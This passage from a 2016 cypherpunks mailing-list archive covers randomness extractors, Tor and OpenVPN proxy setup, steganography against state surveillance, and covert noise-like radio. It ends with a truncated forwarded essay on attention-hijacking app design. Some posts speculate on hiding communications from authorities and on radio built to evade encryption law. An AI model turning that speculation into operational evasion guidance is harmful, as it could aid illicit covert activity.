science professor Zuckerman and graduate student Eshan Chattopadhyay will present research about their method in June at the annual Symposium on Theory of Computing (STOC), the Association for Computing Machinery's premier theoretical computer science conference. They publicly released a draft paper describing their method for making random numbers in an online forum last year. Oded Goldreich, a professor of computer science at the Weizmann Institute of Science in Israel, commented that even if it had only been a moderate improvement over existing methods, it would have justified a 'night-long party. 'When I heard about it, I couldn't sleep,' says Yael Kalai, a senior researcher working in cryptography at Microsoft Research New England who has also worked on randomness extraction. 'I was so excited. I couldn't believe it. I ran to the (online) archive to look at the paper. It's really a masterpiece.' The new method takes two weakly random sequences of numbers and turns them into one sequence of truly random numbers. Weakly random sequences, such as air temperatures and stock market prices sampled over time, harbor predictable patterns. Truly random sequences have nothing predictable about them, like a coin toss. The new method takes two weakly random sequences of numbers and turns them into one sequence of truly random numbers. Previous versions of randomness extractors were less practical because they either required that one of the two source sequences be truly random (which presents a chicken or the egg problem) or that both source sequences be close to truly random. This new method sidesteps both of those restrictions and allows the use of two sequences that are only weakly random. An important application for random numbers is in generating keys for data encryption that are hard for hackers to crack. Data encryption is critical for making secure credit card purchases and bank transactions, keeping personal medical data private and shielding military communications from enemies, among many practical applications. Zuckerman says that although there are already methods for producing high-quality random numbers, they are very computationally demanding. His method produces higher quality randomness with less effort. 'One common way that encryption is misused is by not using high-quality randomness,' says Zuckerman. 'So in that sense, by making it easier to get high-quality randomness, our methods could improve security.' Their paper shows how to generate only one truly random number – akin to one coin toss – but Zuckerman's former student Xin Li has already demonstrated how to expand it to create sequences of many more random numbers. Read more: http://www.dailymail.co.uk/sciencetech/article-3607142/Cybersecurity-breakthrough-masterpiece-technique-create-truly-random-numbers-revealed.html#ixzz49e2Nyj2J From rayzer at riseup.net Wed May 25 09:42:06 2016 From: rayzer at riseup.net (Rayzer) Date: Wed, 25 May 2016 09:42:06 -0700 Subject: FBI Black Helicopters Spying And Databasing Everything, Including Your Barbecue In-Reply-To: <018701d1b63f$c2f13e80$48d3bb80$@gmail.com> References: <5743D517.5070107@riseup.net> <018701d1b63f$c2f13e80$48d3bb80$@gmail.com> Message-ID: <5745D5DE.5030408@riseup.net> On 05/24/2016 09:41 PM, Greg Moss wrote: > OMG - what a bunch of tweakers! Funny you should say that... Considering the computer industry was kept in code by coke/alcohol addicts for decades. Perhaps Methamphetamine is more popular nowdays. The paranoia level IS arguably of the same intensity as someone coming down from a run. Rr "Just because you're paranoid doesn't mean someone isn't following you" ~Thomas Pynchon, Gravity's Rainbow, Proverbs for Paranoids -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From jnn at synfin.org Wed May 25 11:24:08 2016 From: jnn at synfin.org (John Newman) Date: Wed, 25 May 2016 14:24:08 -0400 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: <2124052570.5698347.1463682566194.JavaMail.yahoo@mail.yahoo.com> References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> <573DF1BE.7030000@riseup.net> <2124052570.5698347.1463682566194.JavaMail.yahoo@mail.yahoo.com> Message-ID: <275b7d6681ab1b5546ef09f08e3875a0@synfin.org> On 2016-05-19 14:29, jim bell wrote: > FROM: Rayzer > TO: cypherpunks at cpunks.org > SENT: Thursday, May 19, 2016 10:02 AM > SUBJECT: Re: How long before compulsory microchipping of cattle, I > mean, 'citizens'? > > On 05/18/2016 11:58 PM, Cari Machet wrote: > >> "In germany the id card has a chip >> "They can scan the crowd of a protest and id's can be read >> "When we went on actions some would not carry id some tried to mask >> the chip ... with different metals... >> "We need cloaking devices > > This is easy. It's called a "Faraday cage". A wallet lined with > copper screen would do nicely. > Jim Bell My roommate tried this with a bit of aluminum foil lining the beanie he habitually wore pulled snugly on his head. It didn't stop the satellite beams, unfortunately.. And, no, he was NOT schizophrenic. Well, at least he said he wasnt, heh... -- John Newman From grarpamp at gmail.com Wed May 25 11:50:45 2016 From: grarpamp at gmail.com (grarpamp) Date: Wed, 25 May 2016 14:50:45 -0400 Subject: [Cryptography] Hacking spread spectrum clocking of HW ? In-Reply-To: References: Message-ID: On 5/25/16, dj at deadhat.com wrote: > It depends on the application. > CAZAC codes for stealth canaries anyone? > Cryptographic spreading codes and wide bandwidths are seen in military > *radiations*. *This*, moar liek this. Imagine noise radiator capable of making your spectrum analyzer look like /dev/urandom across the board. There's no center frequency, no clock, no freq hopping, no spreading, no observables, no off the shelf wireless hardware or reference design... it's not based on that. To any viewer, it's just noise. To you and your peers who hold, say, a shared XOR key for data and a seed for DRBG noise, it looks like data... lots of data ;-) With achievable datarate, error correction, and unjammability governed by the range of spectrum you can generate noise over. You could even mimic within existing spectra if need be. The amplifiers and radiators to cover the spectrum are hardware. Everything else is SDR. There is at least one good paper on this, particularly involving GNURadio style SDR as the enabling basis, but I forgot the magic search terms to find it again. While not the one in mind (and not necessarily from the new SDR guerrilla crowd), these are somewhat relavant... Digital Chaotic Communications https://smartech.gatech.edu/bitstream/handle/1853/34849/michaels_alan_j_200908_phd.pdf Synchronization in Cognitive Overlay Systems http://lib.tkk.fi/Dipl/2012/urn100685.pdf Covert Ultrawideband Random Noise papers by Jack Chuang and Ram Narayanan... https://etda.libraries.psu.edu/files/final_submissions/3142 From grarpamp at gmail.com Wed May 25 12:18:39 2016 From: grarpamp at gmail.com (grarpamp) Date: Wed, 25 May 2016 15:18:39 -0400 Subject: Proxy / VPN before Tor in Qubes: Tor bootstrap stops at 80% Message-ID: On 5/25/16, katerimmel at sigaint.org wrote: >> Try turning up debugging. > Debugging shows me that results are all OK until Tor socksport reachability > I'm using JonDo ip changer > What do you means about pointing tor at tor? Tor provides a SOCKS5 interface on the front that is presumably written correctly and not third party, to eliminate jondo and at least test tor at/over tor. ./tor --socks5proxy (-->) ./tor --socksport (-->) internet You may also like to please consider supporting this feature... # Provide a socks5 server port for user apps to use https://community.openvpn.net/openvpn/ticket/577 ... which would then make this an interesting narrow portal to route specific apps through (and things like p2p where you cannot predict / program the far end host to route to) without gratuitously grabbing the entire 0.0.0.0/0 routing table of the host... ./openvpn --config c.ovpn --verb 4 --socks-proxy 127.0.0.1 9050 --route-noexec --route-up /usr/bin/env --script-security 2 This may also be of related use to some users... # MAPADDRESS for IP ranges (CIDR, etc) https://trac.torproject.org/projects/tor/ticket/3982 Gmail breaks thread to add VPN subject, sorry. From anthony at cajuntechie.org Wed May 25 14:44:11 2016 From: anthony at cajuntechie.org (Anthony Papillion) Date: Wed, 25 May 2016 16:44:11 -0500 Subject: New digital activism mailing list Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 A friend and I have set up a discussion mailing list for activists interested in discussing digital freedom, legislation effecting digital rights, government and corporate surveillance, etc. Just thought this group might be interested. If you want to learn more or to subscribe visit https://lists.riseup.net/www/info/digital-rights-activism or send an email to digital-rights-activism-subscribe at lists.riseup.net Anthony - -- OpenPGP Key: 4096R/028ADF7453B04B15 Other Key Info: http://www.cajuntechie.org/p/my-pgp-key.html XMPP?Jabber: cypher at chat.cpunk.us -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJXRhyrAAoJEAKK33RTsEsVa/IP/2gnBfQo2KR/pFz26gWmXlAw jpzavAix6oyStFqZsw1eT6UA3BO05pnaM/ehvf/VSO4SDUIu4rA9S2twInnTTxYS EzcpBz4Hrec/U+Sci9Gc/pSmFdy7xjqmx5PAQi6UgWN/Cdlx9Wjmnq3KafvEZCG/ gVuLSHyE3GhrhihfcgloaFBU5RfgNY2J35Ze/eCup7ZKVC7cDAbwBvrxJHZHxdFr tkDC/DBjYIpj/xdrnJDT86rS9Z6rGCbgRTtXs/RYO9R+A3npPmJj5Pu9Oz0e8NIg mlQsVr3Up5K8ewoq5dWUAV8ApB0ah6jYZ4UA4lxsj9p9Q8DIl15YYzO9+cycXyY7 RzvFLPM0rlVsTzqJQIKFL86oTV7BJ8RGm2tjGNVipsS8M0GIdoKKVsO7T9JoiAIS pGo1LD3d5cZped8l42omqr9HnCBK6gMBjA8UeUW4AupbjJq5ZdhxnUGN33W8pxzg kLdv/o3JKPzdWRQsFvqNKMkbsPNbyA73wuRBPV1alrgdRNARqbObzC8RroWS7Ebt GK5YPm5GvqJu4Wd9TrnNZCrFDY+43SIDBlef2NUpR4t7jkL/29E+J445zTPiuOuf WaFTXMrin1H8VRCaPoaHdVki8a54DUI5TVT6oasf3TWYUnTACM1as039U+dp1gVs tv0mVBLQt2c8rb7MgMxg =ipq9 -----END PGP SIGNATURE----- From ryacko at gmail.com Thu May 26 12:29:25 2016 From: ryacko at gmail.com (Ryan Carboni) Date: Thu, 26 May 2016 12:29:25 -0700 Subject: A promising method to thwart global surveillence Message-ID: The Russian Illegals spy ring in New York used steganography. The Caliphate cell in Brussels used truecrypt files uploaded to cyberlockers in Turkey. But the grugq notes that truecrypt files would probably have a fixed size (and even with a random length, it would still round to kilobyte sizes), so it wouldn't be so simple. Obviously if state-level actors use these methods against the NSA, steganography does have a good role to play. Problem is that machine learning has advanced substantially. In a worst case scenario, it will be obvious that you have steganographic files, that is if photodna hashes are similar for many files, but fuzzy hashes aren't as similar. The best that could be done would be to make automated scans more probabilistic and less reliable (I have tens of thousands of files on my computer), by embedding encrypted data steganographically in images in the PDF file. The text and images of the PDF file could be procedurally generated. But I'm not an expert. I'm just pointing out what makes sense to me. From admin at pilobilus.net Fri May 27 08:26:19 2016 From: admin at pilobilus.net (Steve Kinney) Date: Fri, 27 May 2016 11:26:19 -0400 Subject: A promising method to thwart global surveillence In-Reply-To: References: Message-ID: <5748671B.5060906@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 05/26/2016 03:29 PM, Ryan Carboni wrote: > The Russian Illegals spy ring in New York used steganography. I wasn't able to find much detail on that case (in just a couple of minutes), but it appears that the crew in question were reportedly using a "custom" stego application to hide documents in photos. Steganalysis tools that look for statistical and other anomalies in photos (or audio, etc.) have been under development since ever, and seem to work very well; presumably NSA et al have way better ones than we do. This suggests that the only way to make steganograhy work against State actors is to "act normal" and hope for the best, i.e. that your message traffic will not be inspected. This may sound like it would work, given the terabytes per millisecond of potential carrier files crossing the networks - way more than can be stored and analyzed fast enough for full coverage. Only one little problem: Everyone who has traveled to any "hostile jurisdiction" and everyone who has ever used the word "steganography" in a cleartext message, visited websites on the topic, participated in any kind of online discussion about cryptography, etc. is a small enough set that a large part of /their/ message traffic could be routinely inspected for hidden content by State level actors. So that leaves most spies and all of /us/ out in the cold. > The Caliphate cell in Brussels used truecrypt files uploaded to > cyberlockers in Turkey. But the grugq notes that truecrypt files > would probably have a fixed size (and even with a random length, it > would still round to kilobyte sizes), so it wouldn't be so simple. Not sure how Truecrypt volumes constitute steganography. Padded ciphertext is still ciphertext, plain as day. > Obviously if state-level actors use these methods against the NSA, > steganography does have a good role to play. Problem is that > machine learning has advanced substantially. In a worst case > scenario, it will be obvious that you have steganographic files, > that is if photodna hashes are similar for many files, but fuzzy > hashes aren't as similar. If state-level actors are /caught/ using these methods against the NSA, that would tend to demonstrate that the methods in question do not work against State actors. Hiding files inside of files seems to be a bust, but that's not the only vector for steganography. Manipulating the timing of signal traffic, the timing of "real" environmental noise in audio recordings, the presence/absence/number/postion of certain objects in normal photographs, the presence/location of specific words in text files etc. could convey covert messages with little or no risk of detection through automated analysis - but could not hide kilo- or megabytes of information per carrier file. > The best that could be done would be to make automated scans more > probabilistic and less reliable (I have tens of thousands of files > on my computer), by embedding encrypted data steganographically in > images in the PDF file. The text and images of the PDF file could > be procedurally generated. Any practical stego detection protocol should include native analysis of images embedded in PDF files, with no additional computational overhead vs. analyzing plain old image files. In the case of analyzing the content of seized computer, the presence of stego tools should assure full steganalysis of all relevant files - and stored message traffic to and from the user. > But I'm not an expert. I'm just pointing out what makes sense to > me. Me neither, but I used to be very interested in stenography. Reading up on the subject led me to the conclusion that it should work /great/ against adversaries who "suspect nothing" and/or don't know that stenography exists. Other adversaries, not so much - unless, as noted above, one is using a system more akin to a code than a cipher, which hides a /few/ bits of information in plain sight via the presence, absence or position of "normal" content in text or media files. :o/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (GNU/Linux) iQEcBAEBAgAGBQJXSGcbAAoJEECU6c5Xzmuq5ngIAMODdmUor3IjxjiAMNas2Eli ORv9hSob7GXpakZrEc7ZLGofrZ8aSJHTPSx9/PR2mqraaRYWEo/P/C6iiDabcGon DVhCfGAuhrUoEwRULVqxJkl/2eP5ycZEXOAaJH3YVeVHkbLK2M5j1zwtUQlz/CB9 FtAN9S8cG0QtiP83sDn/gzU6xJZSQH+lMi9ltbaUKWqkU/p87O8kddnPPdqQyFWE FpsbdvjV919MAb7pXRaFZWVshXfj7YR4YgZ60X4ZOUZ3/sJwJ4x3oEnbStEd8lQb hDF8UxZ53NyuS/h8Brw/eLiYLRdjIWN+0ZqYkG+sjHjS7eFWKAGWyntn7CTOP6I= =kulv -----END PGP SIGNATURE----- From jdb10987 at yahoo.com Fri May 27 09:22:05 2016 From: jdb10987 at yahoo.com (jim bell) Date: Fri, 27 May 2016 16:22:05 +0000 (UTC) Subject: A promising method to thwart global surveillence In-Reply-To: <5748671B.5060906@pilobilus.net> References: <5748671B.5060906@pilobilus.net> Message-ID: <1415723331.464091.1464366125503.JavaMail.yahoo@mail.yahoo.com> From: Steve Kinney To: cypherpunks at cpunks.org Sent: Friday, May 27, 2016 8:26 AM Subject: Re: A promising method to thwart global surveillence >If state-level actors are /caught/ using these methods against the >NSA, that would tend to demonstrate that the methods in question do >not work against State actors. Perhaps it would be more correct to say that they don't ALWAYS work.        Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2312 bytes Desc: not available URL: From admin at pilobilus.net Fri May 27 17:17:26 2016 From: admin at pilobilus.net (Steve Kinney) Date: Fri, 27 May 2016 20:17:26 -0400 Subject: Random Number Generator article In-Reply-To: <643599566.243266.1464156352628.JavaMail.yahoo@mail.yahoo.com> References: <643599566.243266.1464156352628.JavaMail.yahoo.ref@mail.yahoo.com> <643599566.243266.1464156352628.JavaMail.yahoo@mail.yahoo.com> Message-ID: <5748E396.6060200@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 05/25/2016 02:05 AM, jim bell wrote: > Seems somewhat over-hyped, and not especially new either. Jim Bell > > http://www.dailymail.co.uk/sciencetech/article-3607142/Cybersecurity-b reakthrough-masterpiece-technique-create-truly-random-numbers-revealed.h tml > > "It could mean completely secure encryption of data, be it emails > or voting - and even help beat climate change. Researchers have > revealed a groundbreaking new technique to create truly random > numbers for the first time. The new method creates truly random > numbers with less computational effort than other methods, which > could facilitate significantly higher levels of security for > everything from consumer credit card transactions to military > communications. > > > The new method takes two weakly random sequences of numbers, such > as air temperatures and stock market prices sampled over time, and > turns them into one sequence of truly random numbers. Wow! Canonical entropy from nowhere, just like magic! Until or unless your adversary observes you collecting samples from publicly available sources and starts working backward from there. Gimme the XOR of a few spark gaps or back-biased tunnel diodes any day. Laws of physics vs. clever arguments... :o) -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (GNU/Linux) iQEcBAEBAgAGBQJXSOOWAAoJEECU6c5XzmuqOqgH/j3ONdkUl97fTMcvkonqN9c7 XcvTVSmoyPqFateVu5Ll4HC4nph+qCyA7xgO7j8Pe7zsXAQCqKuoIn+UIjeZ48/+ a29xb2pgRbL9/hiYckxUY2hdcgEcG12ZoHlwIIoBJYcHa7DpyoJJzTllibHXkQX/ gcDZQI4t/QE3cL7WbD9Ma23yMZtM4Yp4Qoq6gSJukAgxl4MxdRn+ZLfd9zBs6n6s xNDn9CtcOf0A8ioWLOxCz86Ggw85PgIB6/LN5G9SsCHCx8gF4bSjAf8W1PUnrDbw F8yb1a3SNl3/J+KN9W9sx3YOBJIYO2MMASkAJfi+YuLdJEuezfuRdinbUWdPIA0= =Yemk -----END PGP SIGNATURE----- From decoy at iki.fi Fri May 27 17:07:31 2016 From: decoy at iki.fi (Sampo Syreeni) Date: Sat, 28 May 2016 03:07:31 +0300 (EEST) Subject: A promising method to thwart global surveillence In-Reply-To: <1415723331.464091.1464366125503.JavaMail.yahoo@mail.yahoo.com> References: <5748671B.5060906@pilobilus.net> <1415723331.464091.1464366125503.JavaMail.yahoo@mail.yahoo.com> Message-ID: On 2016-05-27, jim bell wrote: >> If state-level actors are /caught/ using these methods against the >> NSA, that would tend to demonstrate that the methods in question do >> not work against State actors. > > Perhaps it would be more correct to say that they don't ALWAYS work. Thus, when do they work and when do they not? Isn't that the question? -- Sampo Syreeni, aka decoy - decoy at iki.fi, http://decoy.iki.fi/front +358-40-3255353, 025E D175 ABE5 027C 9494 EEB0 E090 8BA9 0509 85C2 From zen at freedbms.net Fri May 27 21:28:19 2016 From: zen at freedbms.net (Zenaan Harkness) Date: Sat, 28 May 2016 04:28:19 +0000 Subject: David Miranda interview (Snowden files) Message-ID: https://www.rt.com/op-edge/344201-snowden-leak-david-miranda/ Life changing choices and moments in time. I am grateful to hear parts of this story. Possibility of a full cache dump soonish, it is said. From gmoss82 at gmail.com Fri May 27 21:36:14 2016 From: gmoss82 at gmail.com (Greg Moss) Date: Sat, 28 May 2016 04:36:14 +0000 Subject: David Miranda interview (Snowden files) In-Reply-To: References: Message-ID: Rubbish On May 27, 2016 9:33 PM, "Zenaan Harkness" wrote: > https://www.rt.com/op-edge/344201-snowden-leak-david-miranda/ > > Life changing choices and moments in time. I am grateful to hear parts > of this story. > > Possibility of a full cache dump soonish, it is said. > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 654 bytes Desc: not available URL: From grarpamp at gmail.com Sat May 28 22:17:17 2016 From: grarpamp at gmail.com (grarpamp) Date: Sun, 29 May 2016 01:17:17 -0400 Subject: [Cryptography] Hacking spread spectrum clocking of HW ? In-Reply-To: <58809f5e-a6eb-efe7-68be-ccf21d8f6582@wisc.edu> References: <58809f5e-a6eb-efe7-68be-ccf21d8f6582@wisc.edu> Message-ID: Various government subjects wrote: > eg: Laws in US forbid use of encrypted radio Traditional spread spectrum seem rather off the shelf and wouldn't really consider encrypted as such. What I mentioned *is* encrypted, both at the RF layer itself, and at the data layer riding on top. It's also really hard to locate random background noise (power). Even if, since random noise can't be proven to be crypto, it can't be shut down due to any crypto reason, insufficient cause. Nor do guerrilla radios care about such laws. > In the US hams can encrypt under exactly one specified circumstance: > Control of a space station, meaning a radio station on a satellite. That > is presumably to keep "outsiders" from taking over control. The history of any such takeovers, classified or otherwise, would be interesting read. From admin at pilobilus.net Sun May 29 08:46:37 2016 From: admin at pilobilus.net (Steve Kinney) Date: Sun, 29 May 2016 11:46:37 -0400 Subject: A promising method to thwart global surveillence In-Reply-To: References: <5748671B.5060906@pilobilus.net> <1415723331.464091.1464366125503.JavaMail.yahoo@mail.yahoo.com> Message-ID: <574B0EDD.7040000@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 05/27/2016 08:07 PM, Sampo Syreeni wrote: > On 2016-05-27, jim bell wrote: > >>> If state-level actors are /caught/ using these methods against >>> the NSA, that would tend to demonstrate that the methods in >>> question do not work against State actors. >> >> Perhaps it would be more correct to say that they don't ALWAYS >> work. > > Thus, when do they work and when do they not? Isn't that the > question? Seems a simple question: The more data you are hiding, and the more capable one's adversary, the less likely that steganography will work. I think "code book" steganography, where pre-determined messages from a list of messages known only to the sender and receiver are transmitted via fully visible message timing, content, etc. is very likely to work until or unless a copy of the code book falls into hostile hands. Example: "Any forum post from me, transmitted during an even numbered hour, is an emergency distress call. Any forum post from you transmitted during an even numbered hour means "help is on the way," odd numbered hour means "sorry, you're on your own." Hiding arbitrary data inside media files by flipping bits is likely to fool a human observer, but unlikely to pass through a stego detection filter without tripping an alarm. :o) -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (GNU/Linux) iQEcBAEBAgAGBQJXSw7dAAoJEECU6c5Xzmuqh1QH/A2SZjdk6XCFddjHZ3N2tL69 rPLWtkaxPzfsrVmu5yXcfl9vvPpuaXYP8OVdCCvFiBHGZP3mt4ce98u2Q4H4pnLb Qkoc1FN3X0XtCEMJKufAl+yUy6TmoxTchePhDY4aEt+0gYHnMWsn+qlkTYcSy6mT 51e7MKIr20AKc/f5ItiP4tfYs0KAVezMt7vxxzElq4b9bHDffZJ+Z08N4o4P2bhL eTwS8H5cn3jTuyKe4cmwhLB2HFWjYgZdrVZXaiciFFEzBWkgKmvhgIswX7HGO6Dy 6l3FE6cmB6Rr97M3uexUaAi/JhNGOttMRoN2unf6S8vlhdrzG7XbyVIGss4zJz4= =z/dJ -----END PGP SIGNATURE----- From mirimir at riseup.net Sun May 29 12:58:05 2016 From: mirimir at riseup.net (Mirimir) Date: Sun, 29 May 2016 13:58:05 -0600 Subject: What happened to Pond? In-Reply-To: References: Message-ID: <574B49CD.1080204@riseup.net> On 05/29/2016 01:27 PM, grarpamp wrote: > "*Pond is in stasis*, and has been for several years. I hope that some > of the ideas prove useful in the future, but people should use > something [better polished and reviewed](https://whispersystems.org). > I've no plans to shutdown down the default server, but **new users > should look elsewhere**." -- agl at github You need a telephone number to use that Whisper Systems stuff, right? Setting up Pond servers isn't hard. A friend is working on a how-to. But then there's the Panda exchange server :( From grarpamp at gmail.com Sun May 29 11:47:13 2016 From: grarpamp at gmail.com (grarpamp) Date: Sun, 29 May 2016 14:47:13 -0400 Subject: =?UTF-8?Q?How_Technology_Hijacks_People=E2=80=99s_Minds?= Message-ID: ---------- Forwarded message ---------- From: "ECOTERRA Intl." Date: Sun, 29 May 2016 16:03:05 +0300 Subject: [NATURAL_DEFENCE] How Technology Hijacks People’s Minds To: MAILHUB How Technology Hijacks People’s Minds — from a Magician and Google’s Design Ethicist By Tristan Harris (*) - May 2016- /Estimated reading time: 12 minutes, but read it for your own peace of mind. / I’m an expert on how technology hijacks our psychological vulnerabilities. That’s why I spent the last three years as Google’s Design Ethicist caring about how to design things in a way that defends a billion people’s minds from getting hijacked. When using technology, we often focus /optimistically/ on all the things it does for us. But I want you to show you where it might do the opposite. */Where does technology exploit our minds’ weaknesses/**?* I learned to think this way when I was a magician. Magicians start by looking for /blind spots, edges, vulnerabilities and/ /limits/ of people’s perception, so they can influence what people do without them even realizing it. Once you know how to push people’s buttons, you can play them like a piano. That’s me performing sleight of hand magic at my mother’s birthday party And this is exactly what product designers do to your mind. They play your psychological vulnerabilities (consciously and unconsciously) against you in the race to grab your attention. I want to show you how they do it. Hijack #1: If You Control the Menu, You Control the Choices Western Culture is built around ideals of individual choice and freedom. Millions of us fiercely defend our right to make “free” choices, while we ignore how we’re manipulated upstream by limited menus we didn’t choose. This is exactly what magicians do. They give people the illusion of free choice while architecting the menu so that they win, no matter what you choose. I can’t emphasize how deep this insight is. When people are given a menu of choices, they rarely ask: * “what’s not on the menu?” * “why am I being given /these options/ and not others?” * “do I know the menu provider’s goals?” * “is this menu /empowering/ for my original need, or are the choices actually a distraction?” (e.g. an overwhelmingly array of toothpastes) How /empowering is this menu/ of choices for the need, “I ran out of toothpaste”? For example, imagine you’re out with friends on a Tuesday night and want to keep the conversation going. You open Yelp to find nearby recommendations and see a list of bars. The group turns into a huddle of faces staring down at their phones /comparing bars. /They scrutinize the photos of each, comparing cocktail drinks. Is this menu still relevant to the original desire of the group? It’s not that bars aren’t a good choice, it’s that Yelp substituted the group’s original question (“where can we go to keep talking?”) with a different question (“what’s a bar with good photos of cocktails?”) all by shaping the menu. Moreover, the group falls for the illusion that Yelp’s menu represents a /complete set of choices/ for where to go. While looking down at their phones, they don’t see the park across the street with a band playing live music. They miss the pop-up gallery on the other side of the street serving crepes and coffee. Neither of those show up on Yelp’s menu. Yelp subtly reframes the group’s need “where can we go to keep talking?” in terms of photos of cocktails served. The more choices technology gives us in nearly every domain of our lives (information, events, places to go, friends, dating, jobs) — /the more we assume that our phone is always the most empowering and useful menu to pick from/. Is it? */The “most empowering” menu is different than the menu that has the most choices/*/. /But when we blindly surrender to the menus we’re given, it’s easy to lose track of the difference: * “Who’s free tonight to hang out?” becomes a menu of /most recent people who texted us /(who we could ping). * “What’s happening in the world?” becomes a menu of news feed stories. * “Who’s single to go on a date?” becomes a menu//of faces to swipe on Tinder (instead of local events with friends, or urban adventures nearby). * “I have to respond to this email.” becomes a menu of /keys to type a response/ (instead of empowering ways to communicate with a person). All user interfaces are menus. What if your email client gave you /empowering choices of ways to respond, instead of “what message do you want to type back?” (Design by Tristan Harris)/ When we wake up in the morning and turn our phone over to see a list of notifications — it frames the experience of “waking up in the morning” around a menu of “all the things I’ve missed since yesterday.” A list of notifications when we wake up in the morning — how /empowering is this menu of choices when we wake up? Does it reflect what we care about? (credit to Joe Edelman)/ By shaping the menus we pick from, technology hijacks the way we perceive our choices and replaces them new ones. But the closer we pay attention to the options we’re given, the more we’ll notice when they don’t actually align with our true needs. *Hijack #2: Put a Slot Machine In a Billion Pockets* If you’re an app, how do you keep people hooked? Turn yourself into a slot machine. The average person checks their phone 150 times a day. Why do we do this? Are we making /150/ /conscious/ /choices/? How often do you check your email per day? One major reason why is the #1 psychological ingredient in slot machines: *intermittent variable rewards* . If you want to maximize addictiveness, all tech designers need to do is link a user’s action (like pulling a lever) with a /variable reward/. You pull a lever and immediately receive either an enticing reward (a match, a prize!) or nothing. Addictiveness is maximized when the rate of reward is most variable. Does this effect really work on people? Yes. *Slot machines make more money in the United States than baseball, movies, and theme parks **combined* */./* Relative to other kinds of gambling, people get ‘problematically involved’ with slot machines *3–4x faster* //according to NYU professor Natasha Dow Shull, author of /Addiction by Design./ *But here’s the unfortunate truth — several billion people have a slot machine their pocket:* * When we pull our phone out of our pocket, we’re /playing a slot machine/ to see what notifications we got. * When we pull to refresh our email, we’re /playing a slot machine /to see what new email we got. * When we swipe down our finger to scroll the Instagram feed, we’re /playing a slot machine/ to see what photo comes next. * When we swipe faces left/right on dating apps like Tinder, we’re /playing a slot machine/ to see if we got a match. * When we tap the # of red notifications, we’re /playing a slot machine /to what’s underneath. Apps and websites sprinkle intermittent variable rewards all over their products because it’s good for business. But in other cases, slot machines emerge by accident. For example, there is no malicious corporation behind /all of email/ who consciously chose to make it a slot machine. No one profits when millions check their email and nothing’s there. Neither did Apple and Google’s designers /want/ phones to work like slot machines. It emerged by accident. But now companies like Apple and Google have a responsibility to reduce these effects by /converting intermittent variable rewards into less addictive, more predictable ones/ with better design. For example, they could empower people to set predictable times during the day or week for when they want to check “slot machine” apps, and correspondingly adjust when new messages are delivered to align with those times. Hijack #3: Fear of Missing Something Important (FOMSI) Another way apps and websites hijack people’s minds is by inducing a “1% chance you could be missing something important.” If I convince you that I’m a channel for important information, messages, friendships, or potential sexual opportunities — it will be hard for you to turn me off, unsubscribe, or remove your account — because (aha, I win) you might miss something important: * This keeps us subscribed to newsletters even after they haven’t delivered recent benefits (“what if I miss a future announcement?”) * This keeps us “friended” to people with whom we haven’t spoke in ages (“what if I miss something important from them?”) * This keeps us swiping faces on dating apps, even when we haven’t even met up with anyone in a while (“what if I miss that /one hot match/ who likes me?”) * This keeps us using social media (“what if I miss that important news story or fall behind what my friends are talking about?”) But if we zoom into that fear, we’ll discover that it’s unbounded/: we’ll always miss something important /at any point when we stop using something. * There are magic moments on Facebook we’ll miss by not using it for the 6th hour (e.g. an old friend who’s visiting town /right now/). * There are magic moments we’ll miss on Tinder (e.g. our dream romantic partner) by not swiping our 700th match. * There are emergency phone calls we’ll miss if we’re not connected 24/7/./ /But living moment to moment with the fear of missing something isn’t how we’re built to live./ And it’s amazing how quickly, once we let go of that fear, we wake up from the illusion. When we unplug for more than a day, unsubscribe from those notifications, or go to Camp Grounded  — the concerns we thought we’d have don’t actually happen. /We don’t miss what we don’t see./ The thought, “what if I miss something important?” is generated /in advance of unplugging, unsubscribing, or turning off /—  not after. Imagine if tech companies recognized that, and helped us proactively tune our relationships with friends and businesses in terms of what we define as “time well spent ” for our lives, instead of in terms of what we might miss. Hijack #4: Social Approval Easily one of the most persuasive things a human being can receive. We’re all vulnerable to *social approval*. The need to belong, to be approved or appreciated by our peers is among the highest human motivations. But now our social approval is in the hands of tech companies. When I get tagged by my friend Marc, I imagine him making a /conscious choice /to tag me. But I don’t see how a company like Facebook orchestrated his doing that in the first place. Facebook, Instagram or SnapChat can manipulate how often people get tagged in photos by automatically suggesting all the faces people should tag (e.g. by showing a box with a 1-click confirmation, “Tag Tristan in this photo?”). So when Marc tags me, /he’s actually/ /responding to Facebook’s suggestion,/ not making an independent choice. But through design choices like this, /Facebook controls the multiplier for/ /how often millions of people experience their social approval on the line/. Facebook uses automatic suggestions like this to get people to tag more people, creating more social externalities and interruptions. The same happens when we change our main profile photo — Facebook knows that’s a moment when we’re /vulnerable to social approval/: /“what do my friends think of my new pic?” /Facebook can rank this higher in the news feed, so it sticks around for longer and more friends will like or comment on it. Each time they like or comment on it, we’ll get pulled right back. Everyone innately responds to social approval, but some demographics (teenagers) are more vulnerable to it than others. That’s why it’s so important to recognize how powerful designers are when they exploit this vulnerability. Hijack #5: Social Reciprocity (Tit-for-tat) * You do me a favor, now I owe you one next time. * You say, “thank you”— I have to say “you’re welcome.” * You send me an email— it’s rude not to get back to you. * You follow me — it’s rude not to follow you back. (especially for teenagers) We are /vulnerable/ /to needing to reciprocate others’ gestures/. But as with Social Approval, tech companies now manipulate how often we experience it. In some cases, it’s by accident./Email, texting and messaging apps are social reciprocity factories/. But in other cases, companies exploit this vulnerability on purpose. LinkedIn is the most obvious offender. LinkedIn wants as many people creating social obligations for each other as possible, because each time they reciprocate (by accepting a connection, responding to a message, or endorsing someone back for a skill) they have to come back to linkedin.com where they can get people to spend more time. Like Facebook, LinkedIn exploits an asymmetry in perception. When you receive an invitation from someone to connect, you imagine that person making a /conscious 